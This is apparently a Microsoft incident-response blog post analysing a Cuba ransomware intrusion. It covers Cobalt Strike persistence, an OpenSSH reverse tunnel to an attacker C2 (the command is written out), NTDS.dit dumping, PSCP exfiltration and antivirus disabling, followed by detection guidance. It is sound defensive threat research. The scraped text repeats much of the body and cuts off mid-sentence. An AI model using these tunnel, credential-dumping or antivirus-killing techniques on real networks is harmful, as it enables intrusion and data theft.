What we found<\/h2>\n\n\n\n![\"Timeline](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-1_timeline-1024x354.png\")
Figure 1. Overall timeline of activities of the ransomware incident<\/figcaption><\/figure>\n\n\n\nInitial access<\/h3>\n\n\n\n
DART was unable to determine the initial entry vector of this attack due to the age of this compromise and limited retention of security solutions, along with encrypted devices being reimaged before analysis. The earliest observed activity showed the actor with domain administrator credentials.<\/p>\n\n\n\n
Persistence<\/h3>\n\n\n\n
In DART\u2019s post ransomware investigation of this engagement, the team found multiple instances of scheduled tasks and services being created by the attack for persistence after they had gained access to highly privileged credentials. Services and Scheduled Tasks have the option to run as NT AUTHORITY\\System, allowing their malicious code to run with highly privileged access. Because the actor created those tasks and services on a domain controller, the Local SYSTEM access allowed them to easily access domain administrator accounts. The deployment of a backdoor to a domain controller can help an actor bypass common incident response recovery activity, such as resetting compromised accounts, in the hope of staying resident on the network.<\/p>\n\n\n\n
Service: Cobalt Strike<\/strong><\/p>\n\n\n\nCobalt Strike was seen on a large scale across the network, on domain controllers, servers, and administrator workstations. The actor created Windows services to persist their payload executing rundll32<\/em> to load the Cobalt Strike DLL through invoking the \u201cAllocConsole\u201d<\/em> exported function of a variation of the Termite family of malware. These services were observed to execute with a combination of SYSTEM and domain administrator credentials. Termite malware is often used by crimeware groups to load Cobalt Strike while bypassing antivirus detections. Further information on the Termite malware family can be found in this blog: (Ex)Change of Pace: UNC2596 Observed Leveraging Vulnerabilities to Deploy Cuba Ransomware<\/a>.<\/p>\n\n\n\n![\"Screenshot](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-2-RunDll.png\")
Figure 2. Example of the actor executing Cobalt Strike through rundll32.exe<\/em> with system integrity<\/figcaption><\/figure>\n\n\n\nThe Cobalt Strike DLLs were in C:\\Windows\\Temp<\/em> and used a naming scheme based on the first and local octet of the command and control (C2). Once the actor installed Cobalt Strike on a domain controller, the malware was spread using a PowerShell script, which copied the DLL to C:\\Windows\\Temp<\/em> via SMB, and then executed it through remote service creation.<\/p>\n\n\n\n![\"Event](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-3-MaliciousCopy.png\")
Figure 3. Example of the threat actor copying Cobalt Strike through SMB<\/figcaption><\/figure>\n\n\n\nThe actor elevated their permissions to \u201cNT AUTHORITY\\System\u201d<\/em> through service creation. This service creation was likely done through Cobalt Strike, using a pseudorandom service name, such as \u201c4aedb00\u201d.<\/p>\n\n\n\nScheduled task: OpenSSH<\/strong><\/p>\n\n\n\nThe actor installed OpenSSH on the client\u2019s network to maintain persistence on critical servers, including domain controllers and domain administrator workstations. The actor installed OpenSSH within C:\\Windows\\OpenSSH<\/em>, rather than the standard OpenSSH path in System32.<\/p>\n\n\n\nThe actor created a scheduled task for a persistent SSH connection to their C2 as \u201cNT AUTHORITY\\System\u201d<\/em>. The actor used TCP 443 for their SSH traffic rather than the standard TCP 22. In many organizations, TCP 22 outbound may be blocked, but as TCP 443 is needed for web traffic the port is often open. The actor also enabled port forwarding on TCP 7878 to allow the tunneling of malicious tools through the SSH connection.<\/p>\n\n\n\nThe actor was also observed renaming ssh.exe<\/em> to \u201cC:\\Windows\\OpenSSH\\svchost.exe\u201d<\/em> in a likely attempt to evade detection.<\/p>\n\n\n\n![\"Screenshot](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-4-MasqueradingImage.png\")
Figure 4. Example of the process masquerading to hide SSH usage<\/figcaption><\/figure>\n\n\n\nFour days after the actor deployed the ransomware, the actor returned to the compromised network through their existing OpenSSH persistence to install further persistence SSH services on additional domain controllers and domain administrator workstations.<\/p>\n\n\n\n
The actor used OpenSSH\u2019s sftp-server to transfer files between their C2 and the compromised host. The actor generated SSH keys on compromised hosts using ssh-keygen.exe<\/em>, a tool apart of the OpenSSH tool suite. This allowed the actor to SSH using the keys rather than credentials, after credentials had been reset.<\/p>\n\n\n\nLateral movement<\/h3>\n\n\n\n
Impacket (WMI)<\/strong><\/p>\n\n\n\nImpacket\u2019s WMI modules were used throughout the early stages of the compromise for remote execution and discovery. Impacket<\/a> is an open-source collection of scripts for working with network protocols. This toolkit has recently been used by a large variety of crimeware groups for lateral movement and network discovery.<\/p>\n\n\n\nThe actor used Impacket to execute PowerShell scripts out of \u201cC:\\Perflogs\\\u201d<\/em>, which created .txt<\/em> files within the same directory. All commands executed through Impacket output the results of the command to \u201c\\\\127.0.0.1\\ADMIN$\\__1648051380.61\u201d<\/em>. The actor then deleted the PowerShell scripts and text files after execution.<\/p>\n\n\n\n![\"Screenshot](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-5-host_ip.png\")
Figure 5. Sample Impacket query with results being output into a file within the ADMIN$ directory<\/figcaption><\/figure>\n\n\n\nThe actor also used Impacket to test if the destination server was able to ping the actor\u2019s C2 before deploying Cobalt Strike to the device.<\/p>\n\n\n\n![\"Screenshot](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-6-Ping2.png\")
Figure 6. Actor testing the connectivity to their C2 through Impacket<\/figcaption><\/figure>\n\n\n\nPsExec<\/strong><\/p>\n\n\n\nThe actor used PsExec.exe<\/em> to spread the ransomware on the victims\u2019 network. The actor first executed \u201copen.bat\u201d<\/em>, which executed \u201cnet share [C-Z]=[C-Z]:\\ \/grant:everyone,FULL\u201d<\/em>. This shared every drive on the host, granting access to everyone. \u201cA.exe\u201d<\/em>, \u201cAnet.exe\u201d<\/em>, and \u201cAus.exe\u201d<\/em> are all variants of the Cuba ransomware.<\/p>\n\n\n\n![\"Screenshot](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-7-psexec-1024x848.png\")
Figure 7. Command lines the actor executed through PsExec<\/figcaption><\/figure>\n\n\n\nRemote desktop protocol<\/strong><\/p>\n\n\n\nWhile the attacker had access to lateral movement and remote code execution via Impacket and PsExec, the main method they used for lateral movement in this incident was Remote Desktop Protocol (RDP), which allowed them to use a GUI environment to change system settings and install malware. The actor used domain administrator accounts to RDP between devices.<\/p>\n\n\n\n
Credential access<\/h3>\n\n\n\n
WDigest<\/strong><\/p>\n\n\n\nThe actor abused WDigest to cache credentials early in the compromise. This enabled the actor to gain access to domain administrator credentials.<\/p>\n\n\n\n
WDigest is a Windows feature that when enabled, caches credentials in clear text. This is often abused by credential access tools, such as Mimikatz. To detect if WDigest has been enabled within your network, the registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential<\/em> will be set to 1. This can be disabled by setting the value to 0.<\/p>\n\n\n\n![\"Screenshot](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-8-Wdigest-1024x85.png\")
Figure 8. Example of the actor enabling WDigest<\/figcaption><\/figure>\n\n\n\nNTDSUtil Dumping<\/strong><\/p>\n\n\n\nThe actor obtained the Active Directory database (NTDS.dit<\/em>) twice. On the first instance, the actor obtained the NTDS.dit<\/em> five months into the compromise. Four days after the deployment of ransomware, the actor obtained the NTDS.dit<\/em> a second time. The actor was able to create a copy of the NTDS.dit<\/em> through the usage of the native tool ntdsutil.exe<\/em>, copying the .dit<\/em> to \u201cC:\\Windows\\Temp\\data\\audit\\Active Directory\\ntds.dit\u201d<\/em>.<\/p>\n\n\n\n![\"Screenshot](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-9-ntdsutil.png\")
Figure 9. Actor command to obtain ntds.dit<\/em><\/figcaption><\/figure>\n\n\n\nVolume shadow copy access<\/strong><\/p>\n\n\n\nThe actor used a second method to obtain the Active Directory database, they used \u201cvssadmin\u201d<\/em> to create a volume shadow copy of a domain controller. This technique creates a static copy of system files that a user would not typically be able to access. Once the volume shadow copy was created, the actor copied the NTDS.dit<\/em>, SYSTEM hive and SECURITY hive to C:\\Windows\\<\/em>, where they could then remotely copy through the ADMIN$ share.<\/p>\n\n\n\n![\"Screenshot](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-10-vssadmin-1024x157.png\")
Figure 10. Actor commands to create Volume Shadow Copy and copy the ntds.dit<\/em><\/figcaption><\/figure>\n\n\n\nExfiltration<\/h3>\n\n\n\n
Compression<\/strong><\/p>\n\n\n\nThe actor was observed using 7-Zip to compress files before exfiltration. 7z.exe<\/em> was executed out of C:\\Windows\\Temp<\/em>. The actor did not include a password for the archive and used the device hostname as the name of the archive (for example: DC01.7z<\/em>).<\/p>\n\n\n\nPSCP<\/strong><\/p>\n\n\n\nThe actor used PuTTY Secure Copy (PSCP) to remotely exfiltrate network shares to an actor controlled C2. This version of PSCP had been renamed to \u201clsas.exe\u201d<\/em> in an attempt to masquerade itself as the legitimate \u201clsass.exe\u201d<\/em> service. PSCP was executed out of C:\\Windows\\Temp<\/em>. The actor targeted Staff and Financial related resources.<\/p>\n\n\n\n![\"Screenshot](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-11-lsas-1024x437.png\")
Figure 11. Masqueraded PSCP to exfiltrate files<\/figcaption><\/figure>\n\n\n\nDefense evasion<\/h3>\n\n\n\n
Disabling antivirus<\/strong><\/p>\n\n\n\nThe actor disabled Microsoft Defender Antivirus on multiple devices after files had been quarantined by the antivirus. The actor turned off Microsoft Defender Antivirus through the Windows Security GUI application while connected via RDP to the device.<\/p>\n\n\n\n![\"Screenshot](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-12-RTMdisabled-647x1024.png\")
Figure 12. Microsoft Defender for Endpoint alert from the actor disabling real-time monitoring<\/figcaption><\/figure>\n\n\n\nKernel driver<\/strong><\/p>\n\n\n\nThe actor used an Avast anti-rootkit driver. Unit 42 recently released a blog<\/a> on how Cuba ransomware groups have used this driver to disable antivirus software before deploying the Cuba ransomware.<\/p>\n\n\n\nThe actor installed the driver using the \u201csc\u201d<\/em> command, enabling kernel-level permissions. The actor then started the service with \u201csc start aswSP-ArPot2\u201d<\/em>. This service was used by the actor to disable the victims\u2019 antivirus products through Kernel privileges. Antivirus products being disabled within the victim network ensured that their ransomware would spread without the malware being quarantined or prevented.<\/p>\n\n\n\n![\"Screenshot](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-13-KernelDriver.png\")
Figure 13. Vulnerable driver being installed<\/figcaption><\/figure>\n\n\n\nThe actor also created benign binaries to trigger the driver vulnerability. These binaries would iterate through a list of common antivirus executable names, providing each one to the control code 0x9988C094<\/em> and subsequently tasking the driver to kill those processes.<\/p>\n\n\n\nDiscovery<\/h3>\n\n\n\n
The actor was observed executing generic system enumeration commands. While these commands are not malicious, when seen together, it can often indicate an unauthorized user is enumerating the system.<\/p>\n\n\n\n
The actor was seen executing the following commands:<\/p>\n\n\n\n
\n- whoami<\/li>\n\n\n\n
- ping 8.8.8.8<\/li>\n\n\n\n
- TASKLIST \/v<\/li>\n\n\n\n
- sc queryex type=service state=all<\/li>\n\n\n\n
- wevtutil el<\/li>\n\n\n\n
- SYSTEMINFO<\/li>\n\n\n\n
- dsquery user -limit 100000<\/li>\n\n\n\n
- powershell -command “Get-ADUser -Filter * -Properties * | Out-File C:\\Windows\\Temp\\data\\domain_user.txt -Append”<\/li>\n\n\n\n
- powershell -command “Get-ADComputer -Filter * -Properties * | Out-File C:\\Windows\\Temp\\data\\domain_pc.txt -Append”<\/li>\n\n\n\n
- wmic useraccount list full<\/li>\n<\/ul>\n\n\n\n
Recommended detection and defense strategies<\/h2>\n\n\n\n
As we observe more attacks using similar methods as described in this blog, organizations must ensure they follow security practices to defend their servers. The following is a list of recommendations for monitoring that organizations should implement as part of their detection strategy.<\/p>\n\n\n\n
Service creation<\/h3>\n\n\n\n
Service creation events should be monitored for anomalous events. A high priority alert should be placed on administrator accounts creating services that execute as System. This is a common privilege escalation technique that can be utilized in a variety of methods, including having the service.<\/p>\n\n\n\n
\n- Execute a malicious binary directly,<\/li>\n\n\n\n
- Write to an actor controlled Named Pipe, allowing the actor to steal an impersonation token,<\/li>\n\n\n\n
- Executing a DLL through rundll32.exe<\/em><\/li>\n<\/ol>\n\n\n\n
![\"Screenshot](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-14-RunDll-exec.png\")
Figure 14. Instance of rundll32.exe <\/em>execute Cobalt Strike with System integrity level<\/figcaption><\/figure>\n\n\n\nNew service creations should be monitored for anomalous paths or executables. High priority alerts should be made for drivers located within those anomalous paths. While the driver was legitimately signed, the location can be a sign of malicious use. Examples of anomalous paths include but are not limited to:<\/p>\n\n\n\n
\n- C:\\Temp\\<\/li>\n\n\n\n
- C:\\ProgramData\\<\/li>\n\n\n\n
- C:\\Windows\\<\/li>\n\n\n\n
- C:\\Windows\\Temp\\<\/li>\n<\/ul>\n\n\n\n
Use of SSH<\/h3>\n\n\n\n
Microsoft recommends monitoring for unauthorized installations and usage of SSH in your network. SSH should not run as \u201cNT AUTHORITY\\System\u201d<\/em>.<\/p>\n\n\n\nIn this incident, the actor used the following SSH command lines. Similar activity should be monitored within your environment:<\/p>\n\n\n\n
ssh <organization>@<malicious IP address> -p 443 -i C:\\ProgramData\\ssh\\id_ed25519 -R <malicious IP address>:10129:127.0.0.1:7878 -N -C -o IdentitiesOnly=yes -o StrictHostKeyChecking=no<\/pre>\n\n\n\nThe actor attempted to masquerade the SSH process as \u201c<\/em>svchost.exe\u201d<\/em><\/em>, so monitoring for the command on other process names may indicate process masquerading.<\/p>\n\n\n\nCopying to remote share<\/h3>\n\n\n\n
Microsoft recommends monitoring for the command prompt accessing remote shares. This was a common technique used by the actor for transferring files throughout the network.<\/p>\n\n\n\n![\"Screenshot](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-15-PID500-1024x860.png\")
Figure 15. The actor copying Cobalt Strike via SMB<\/figcaption><\/figure>\n\n\n\nMicrosoft Defender for Endpoint will create an alert when the command prompt accesses remote shares. This includes the Impacket usage where the command targets the localhost ADMIN$ share. Monitoring these alerts within your network can help detect unauthorized access.<\/p>\n\n\n\n![\"Screenshot](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-16-technique-info.png\")
Figure 16. Sample alert in Defender for Endpoint when a command prompt accesses a remote share<\/figcaption><\/figure>\n\n\n\nPsExec<\/h3>\n\n\n\n
Networks should monitor for unauthorized usage of PsExec. Suggested detection techniques include:<\/p>\n\n\n\n
\n- Existence or execution of the binary: PsExec.exe<\/em><\/li>\n\n\n\n
- Existence or execution of the service binary: PsExeSvc.exe<\/em><\/li>\n\n\n\n
- Service creation named PsExeSvc<\/em><\/li>\n\n\n\n
- Named Pipes created with the name PsExeSvc<\/em><\/li>\n<\/ol>\n\n\n\n
The techniques that PsExec uses can easily be replicated, either through living-off-the-land tools or through a custom toolset using the Windows API. Monitoring for each stage of PsExec can help detect unauthorized variants within your network. PsExec works in three stages:<\/p>\n\n\n\n
\n- SMB connection to ADMIN$ on the destination device, copying the binary \u201cPSEXESVC\u201d<\/em> to the Windows directory.<\/li>\n\n\n\n
- Remote connection to RPC (port 135) on the destination device, creating a service to execute the binary.<\/li>\n\n\n\n
- Create the named pipe \\\\.\\pipe\\PSEXESVC<\/em> to remotely communicate between host and destination.<\/li>\n<\/ol>\n\n\n\n
![\"Diagram](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-17-psexecExplained.png\")
Figure 17. Diagram describing how PsExec works<\/figcaption><\/figure>\n\n\n\nMonitoring executable files being written to administrative shares may help detect attempts of lateral movement. This can include monitoring for native command lines, such as copy, targeting remote shares like what we mentioned above. Defender for Endpoint can be used to monitor file creation events via Server Message Block (SMB) through DeviceFileEvents. The executable file will be created by the ntoskrnl.exe process, which is the kernel process that manages SMB, and the ShareName column will be ADMIN$.<\/p>\n\n\n\n![\"Sample](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-18-PSFileEvent-1024x463.png\")
Figure 18. Example of PsExeSvc.exe<\/em> being created via Server Message Block (SMB) in Defender for Endpoint<\/figcaption><\/figure>\n\n\n\nAnomalous remote connections to RPC (Port 135) should be monitored within the network, as this can be used by a process to remotely create and start a service. The summarize and sort operators within Defender for Endpoint\u2019s Advanced Hunting can help detect uncommon connections on Port 135. The following KQL can help build a basis for identifying anomalous connections:<\/p>\n\n\n\n
DeviceNetworkEvents\n| where RemotePort == 135\n| summarize count() by InitiatingProcessFileName\n| sort by count_ asc<\/pre>\n\n\n\n![\"Sample](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-Port135-1024x464.png\")
Figure 19. Image showing PsExec.exe connecting to a remote host on port 135<\/figcaption><\/figure>\n\n\n\nThis technique can also be replicated through remote service creation using named pipes. An actor can remotely connect to the IPC$ share and open the named pipe svcctl to remotely create a service. This would contain similar detections, except the traffic will be over port 445 to the IPC$ share.<\/p>\n\n\n\n
On the destination end, the RPC connection will result in the creation of a service. Monitoring for unauthorized service creation can be done through capturing the 4679 event in the System event log.<\/p>\n\n\n\n![\"Sample](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-20-psexecService-1024x420.png\")
Figure 20. Service creation event in Defender for Endpoint<\/figcaption><\/figure>\n\n\n\nRemote named pipe communication can be monitored through the creation of the named pipe on the destination server. PsExeSvc.exe<\/em> will create a named pipe called PSEXESVC, which the host device can connect to through the IPC$ share. As the host device connection is through SMB, the ntoskrnl.exe<\/em> process will connect to the named pipe as a client.<\/p>\n\n\n\n![\"Results](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-21-NamedPipe-1024x531.png\")
Figure 21. Remote SMB named pipe communications for PsExec<\/figcaption><\/figure>\n\n\n\nNTDS.dit<\/em> dumping<\/h3>\n\n\n\nMonitor the usage of ntdsutil for malicious instances, where actors may attempt to obtain the NTDS.dit<\/em>. The command in the NTDS.dit<\/em> dumping section shows how the actor used this tool to create a copy of the NTDS.dit<\/em>. This command can be monitored, with the path being the only variable that will change. There are limited legitimate reasons to create a full NTDS.dit<\/em> copy.<\/p>\n\n\n\n![\"Sample](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-22-ntdsutil2-1024x962.png\")
Figure 22. Defender for Endpoint alert from ntds.dit <\/em>dump<\/figcaption><\/figure>\n\n\n\nDefender for Endpoint alerts on the dumping of the NTDS.dit<\/em>, and these alerts should be responded to with high priority. Monitoring for the unauthorized usage of the \u201cntdsutil\u201d<\/em> tool is strongly encouraged as well.<\/p>\n\n\n\nIf your network has file monitoring enabled, alerting on the creation of new .dit files can also help detect potential NTDS.dit<\/em> dumping. The actor was observed copying the NTDS.dit<\/em> out of a volume shadow copy.<\/p>\n\n\n\n![\"Screenshot](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-23-copying-NTDS-1024x158.png\")
Figure 23. Example command copying NTDS.dit <\/em>from a volume shadow copy<\/figcaption><\/figure>\n\n\n\nAntivirus tampering<\/h3>\n\n\n\n
Organizations should monitor and respond to antivirus and endpoint detection and response (EDR) alerts where antivirus has been disabled or tampered with. Wherever possible, anti-tampering settings should be enabled to prevent actors from being able to interact with and disable antivirus software. For more information about Defender for Endpoint tamper protection, visit our docs page: Protect security settings with tamper protection<\/a>.<\/p>\n\n\n\nMicrosoft Defender Antivirus provides event logging<\/a> on attempted tampering of the product. This can include the disabling of services, such as Real Time Protection (Event ID: 5001). An alert will also be created within the Defender for Endpoint portal where customers have the ability to further triage the alert through the advanced hunting interface<\/a>. Monitoring for the usage of the Windows PowerShell cmdlet can also help discover instances of anti-virus tampering.<\/p>\n\n\n\n![\"Screenshot](\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2022\/10\/FO2-24-exampleAVtamp-1024x604.png\")
Figure 24. Sample command to look for antivirus tampering<\/figcaption><\/figure>\n\n\n\nRemote desktop protocol<\/h3>\n\n\n\n
DART was able to detect actor RDP connections through anomalous connections. These anomalous connections include:<\/p>\n\n\n\n
\n- Domain administrators logging into multiple servers for the first time, and<\/li>\n\n\n\n
- Domain administrators initiating RDP connections from abnormal locations.<\/li>\n<\/ul>\n\n\n\n
Domain and enterprise administrator logons should be audited for anomalous connections, including connections originating from edge servers or onto servers that they do not usually administrate. Multifactor authentication (MFA) should be enforced for administrator accounts.<\/p>\n\n\n\n
Conclusion<\/h2>\n\n\n\n
Ransomware groups continue to grow in sophistication through the increasing hibernation times before encryption, large varieties of persistent access and the use of legitimate signed binaries. These groups continue to target sensitive data for exfiltration, with some groups returning to the network post-encryption to ensure they maintain a foothold on the network.<\/p>\n\n\n\n
Networks must remain vigilant hunting for these TTPs and anomalous behaviors. The Cuba ransomware group used a large variety of living of the land techniques to help evade detection by antivirus products. This requires a stronger focus on anomaly and behavioral detections for hunting on a network, rather than standard malicious file detection. Software auditing of remote access tools and remote execution tools, such as PsExec and SSH, should be regularly evaluated.<\/p>\n\n\n\n
Microsoft strongly recommends focusing on the following actions to help improve your network\u2019s security posture:<\/p>\n\n\n\n
Initial access<\/h3>\n\n\n\n
DART was unable to determine the initial entry vector of this attack due to the age of this compromise and limited retention of security solutions, along with encrypted devices being reimaged before analysis. The earliest observed activity showed the actor with domain administrator credentials.<\/p>\n\n\n\n
Persistence<\/h3>\n\n\n\n
In DART\u2019s post ransomware investigation of this engagement, the team found multiple instances of scheduled tasks and services being created by the attack for persistence after they had gained access to highly privileged credentials. Services and Scheduled Tasks have the option to run as NT AUTHORITY\\System, allowing their malicious code to run with highly privileged access. Because the actor created those tasks and services on a domain controller, the Local SYSTEM access allowed them to easily access domain administrator accounts. The deployment of a backdoor to a domain controller can help an actor bypass common incident response recovery activity, such as resetting compromised accounts, in the hope of staying resident on the network.<\/p>\n\n\n\n
Service: Cobalt Strike<\/strong><\/p>\n\n\n\n Cobalt Strike was seen on a large scale across the network, on domain controllers, servers, and administrator workstations. The actor created Windows services to persist their payload executing rundll32<\/em> to load the Cobalt Strike DLL through invoking the \u201cAllocConsole\u201d<\/em> exported function of a variation of the Termite family of malware. These services were observed to execute with a combination of SYSTEM and domain administrator credentials. Termite malware is often used by crimeware groups to load Cobalt Strike while bypassing antivirus detections. Further information on the Termite malware family can be found in this blog: (Ex)Change of Pace: UNC2596 Observed Leveraging Vulnerabilities to Deploy Cuba Ransomware<\/a>.<\/p>\n\n\n\n The Cobalt Strike DLLs were in C:\\Windows\\Temp<\/em> and used a naming scheme based on the first and local octet of the command and control (C2). Once the actor installed Cobalt Strike on a domain controller, the malware was spread using a PowerShell script, which copied the DLL to C:\\Windows\\Temp<\/em> via SMB, and then executed it through remote service creation.<\/p>\n\n\n\n The actor elevated their permissions to \u201cNT AUTHORITY\\System\u201d<\/em> through service creation. This service creation was likely done through Cobalt Strike, using a pseudorandom service name, such as \u201c4aedb00\u201d.<\/p>\n\n\n\n Scheduled task: OpenSSH<\/strong><\/p>\n\n\n\n The actor installed OpenSSH on the client\u2019s network to maintain persistence on critical servers, including domain controllers and domain administrator workstations. The actor installed OpenSSH within C:\\Windows\\OpenSSH<\/em>, rather than the standard OpenSSH path in System32.<\/p>\n\n\n\n The actor created a scheduled task for a persistent SSH connection to their C2 as \u201cNT AUTHORITY\\System\u201d<\/em>. The actor used TCP 443 for their SSH traffic rather than the standard TCP 22. In many organizations, TCP 22 outbound may be blocked, but as TCP 443 is needed for web traffic the port is often open. The actor also enabled port forwarding on TCP 7878 to allow the tunneling of malicious tools through the SSH connection.<\/p>\n\n\n\n The actor was also observed renaming ssh.exe<\/em> to \u201cC:\\Windows\\OpenSSH\\svchost.exe\u201d<\/em> in a likely attempt to evade detection.<\/p>\n\n\n\n Four days after the actor deployed the ransomware, the actor returned to the compromised network through their existing OpenSSH persistence to install further persistence SSH services on additional domain controllers and domain administrator workstations.<\/p>\n\n\n\n The actor used OpenSSH\u2019s sftp-server to transfer files between their C2 and the compromised host. The actor generated SSH keys on compromised hosts using ssh-keygen.exe<\/em>, a tool apart of the OpenSSH tool suite. This allowed the actor to SSH using the keys rather than credentials, after credentials had been reset.<\/p>\n\n\n\n Impacket (WMI)<\/strong><\/p>\n\n\n\n Impacket\u2019s WMI modules were used throughout the early stages of the compromise for remote execution and discovery. Impacket<\/a> is an open-source collection of scripts for working with network protocols. This toolkit has recently been used by a large variety of crimeware groups for lateral movement and network discovery.<\/p>\n\n\n\n The actor used Impacket to execute PowerShell scripts out of \u201cC:\\Perflogs\\\u201d<\/em>, which created .txt<\/em> files within the same directory. All commands executed through Impacket output the results of the command to \u201c\\\\127.0.0.1\\ADMIN$\\__1648051380.61\u201d<\/em>. The actor then deleted the PowerShell scripts and text files after execution.<\/p>\n\n\n\n The actor also used Impacket to test if the destination server was able to ping the actor\u2019s C2 before deploying Cobalt Strike to the device.<\/p>\n\n\n\n PsExec<\/strong><\/p>\n\n\n\n The actor used PsExec.exe<\/em> to spread the ransomware on the victims\u2019 network. The actor first executed \u201copen.bat\u201d<\/em>, which executed \u201cnet share [C-Z]=[C-Z]:\\ \/grant:everyone,FULL\u201d<\/em>. This shared every drive on the host, granting access to everyone. \u201cA.exe\u201d<\/em>, \u201cAnet.exe\u201d<\/em>, and \u201cAus.exe\u201d<\/em> are all variants of the Cuba ransomware.<\/p>\n\n\n\n Remote desktop protocol<\/strong><\/p>\n\n\n\n While the attacker had access to lateral movement and remote code execution via Impacket and PsExec, the main method they used for lateral movement in this incident was Remote Desktop Protocol (RDP), which allowed them to use a GUI environment to change system settings and install malware. The actor used domain administrator accounts to RDP between devices.<\/p>\n\n\n\n WDigest<\/strong><\/p>\n\n\n\n The actor abused WDigest to cache credentials early in the compromise. This enabled the actor to gain access to domain administrator credentials.<\/p>\n\n\n\n WDigest is a Windows feature that when enabled, caches credentials in clear text. This is often abused by credential access tools, such as Mimikatz. To detect if WDigest has been enabled within your network, the registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential<\/em> will be set to 1. This can be disabled by setting the value to 0.<\/p>\n\n\n\n NTDSUtil Dumping<\/strong><\/p>\n\n\n\n The actor obtained the Active Directory database (NTDS.dit<\/em>) twice. On the first instance, the actor obtained the NTDS.dit<\/em> five months into the compromise. Four days after the deployment of ransomware, the actor obtained the NTDS.dit<\/em> a second time. The actor was able to create a copy of the NTDS.dit<\/em> through the usage of the native tool ntdsutil.exe<\/em>, copying the .dit<\/em> to \u201cC:\\Windows\\Temp\\data\\audit\\Active Directory\\ntds.dit\u201d<\/em>.<\/p>\n\n\n\n Volume shadow copy access<\/strong><\/p>\n\n\n\n The actor used a second method to obtain the Active Directory database, they used \u201cvssadmin\u201d<\/em> to create a volume shadow copy of a domain controller. This technique creates a static copy of system files that a user would not typically be able to access. Once the volume shadow copy was created, the actor copied the NTDS.dit<\/em>, SYSTEM hive and SECURITY hive to C:\\Windows\\<\/em>, where they could then remotely copy through the ADMIN$ share.<\/p>\n\n\n\n Compression<\/strong><\/p>\n\n\n\n The actor was observed using 7-Zip to compress files before exfiltration. 7z.exe<\/em> was executed out of C:\\Windows\\Temp<\/em>. The actor did not include a password for the archive and used the device hostname as the name of the archive (for example: DC01.7z<\/em>).<\/p>\n\n\n\n PSCP<\/strong><\/p>\n\n\n\n The actor used PuTTY Secure Copy (PSCP) to remotely exfiltrate network shares to an actor controlled C2. This version of PSCP had been renamed to \u201clsas.exe\u201d<\/em> in an attempt to masquerade itself as the legitimate \u201clsass.exe\u201d<\/em> service. PSCP was executed out of C:\\Windows\\Temp<\/em>. The actor targeted Staff and Financial related resources.<\/p>\n\n\n\n Disabling antivirus<\/strong><\/p>\n\n\n\n The actor disabled Microsoft Defender Antivirus on multiple devices after files had been quarantined by the antivirus. The actor turned off Microsoft Defender Antivirus through the Windows Security GUI application while connected via RDP to the device.<\/p>\n\n\n\n Kernel driver<\/strong><\/p>\n\n\n\n The actor used an Avast anti-rootkit driver. Unit 42 recently released a blog<\/a> on how Cuba ransomware groups have used this driver to disable antivirus software before deploying the Cuba ransomware.<\/p>\n\n\n\n The actor installed the driver using the \u201csc\u201d<\/em> command, enabling kernel-level permissions. The actor then started the service with \u201csc start aswSP-ArPot2\u201d<\/em>. This service was used by the actor to disable the victims\u2019 antivirus products through Kernel privileges. Antivirus products being disabled within the victim network ensured that their ransomware would spread without the malware being quarantined or prevented.<\/p>\n\n\n\n The actor also created benign binaries to trigger the driver vulnerability. These binaries would iterate through a list of common antivirus executable names, providing each one to the control code 0x9988C094<\/em> and subsequently tasking the driver to kill those processes.<\/p>\n\n\n\n The actor was observed executing generic system enumeration commands. While these commands are not malicious, when seen together, it can often indicate an unauthorized user is enumerating the system.<\/p>\n\n\n\n The actor was seen executing the following commands:<\/p>\n\n\n\n As we observe more attacks using similar methods as described in this blog, organizations must ensure they follow security practices to defend their servers. The following is a list of recommendations for monitoring that organizations should implement as part of their detection strategy.<\/p>\n\n\n\n Service creation events should be monitored for anomalous events. A high priority alert should be placed on administrator accounts creating services that execute as System. This is a common privilege escalation technique that can be utilized in a variety of methods, including having the service.<\/p>\n\n\n\n New service creations should be monitored for anomalous paths or executables. High priority alerts should be made for drivers located within those anomalous paths. While the driver was legitimately signed, the location can be a sign of 